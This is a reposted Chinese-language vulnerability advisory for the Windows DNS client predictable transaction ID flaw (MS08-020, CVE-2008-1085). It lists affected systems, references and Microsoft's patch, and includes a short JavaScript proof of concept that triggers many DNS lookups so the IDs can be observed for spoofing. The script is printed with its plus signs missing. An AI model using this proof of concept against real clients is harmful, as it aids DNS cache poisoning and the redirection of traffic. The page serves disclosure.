手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >Microsoft Windows DNS客户端可预测事件处理ID漏洞(MS08-020)
Microsoft Windows DNS客户端可预测事件处理ID漏洞(MS08-020)
摘要:受影响系统:MicrosoftWindowsXPSP2MicrosoftWindowsVistaMicrosoftWindowsServer...

受影响系统:

Microsoft Windows XP SP2

Microsoft Windows Vista

Microsoft Windows Server 2003 SP2

Microsoft Windows Server 2003 SP1

Microsoft Windows 2000SP4

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 28553

CVE(CAN) ID: CVE-2008-1085

Microsoft Windows是微软发布的非常流行的操作系统。

Windows DNS客户端服务在执行DNS查询时,随机选择事件处理值没有提供足够的熵。未经认证的攻击者可以向有漏洞客户端的DNS请求返回恶意响应,欺骗或重新定向合法位置的Internet通讯。

<*来源:Amit Klein (Amit.Klein@SanctumInc.com)

链接:http://secunia.com/advisories/29696/

http://marc.info/?l=bugtraq&m=120767868524748&w=2

http://www.trusteer.com/docs/Microsoft_Windows_resolver_DNS_cache_poisoning.pdf

http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true

http://www.us-cert.gov/cas/techalerts/TA08-099A.html

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>

<body>

<script>

var max_n=20;

var n=0;

var x=new Image();

x.onerror=loadnext;

x.onload=loadnext;

function loadnext()

{

if (n<max_n)

{

n ;

x.src="http://t-" (new Date()).getTime()

"-" n ".domain.site/";

}

}

loadnext();

</script>

</body>

</html>

建议:

--------------------------------------------------------------------------------

厂商补丁:

Microsoft

---------

Microsoft已经为此发布了一个安全公告(MS08-020)以及相应补丁:

MS08-020:Vulnerability in DNS Client Could Allow Spoofing (945553)

链接:http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true

【Microsoft Windows DNS客户端可预测事件处理ID漏洞(MS08-020)】相关文章:

Persits Software XUpload.ocx 含远程栈溢出漏洞

Microsoft Visual Interdev 文件缓冲区溢出漏洞

Microsoft SharePoint 服务器源码 HTML 注入漏洞

IBM solidDB数据库含格式串处理以及拒绝服务漏洞

Microsoft IE onunload事件地址栏欺骗漏洞

Windows DNS客户端可预测事件处理ID漏洞

Adobe Acrobat 存在URL处理命名注入漏洞

Linux Kiss Server多个格式串处理漏洞

Novell iPrint ienipp.ocx ActiveX 控件溢出漏洞

MS08-001 - Windows TCP/IP中的漏洞可能允许远程执行代码(941644)

精品推荐
分类导航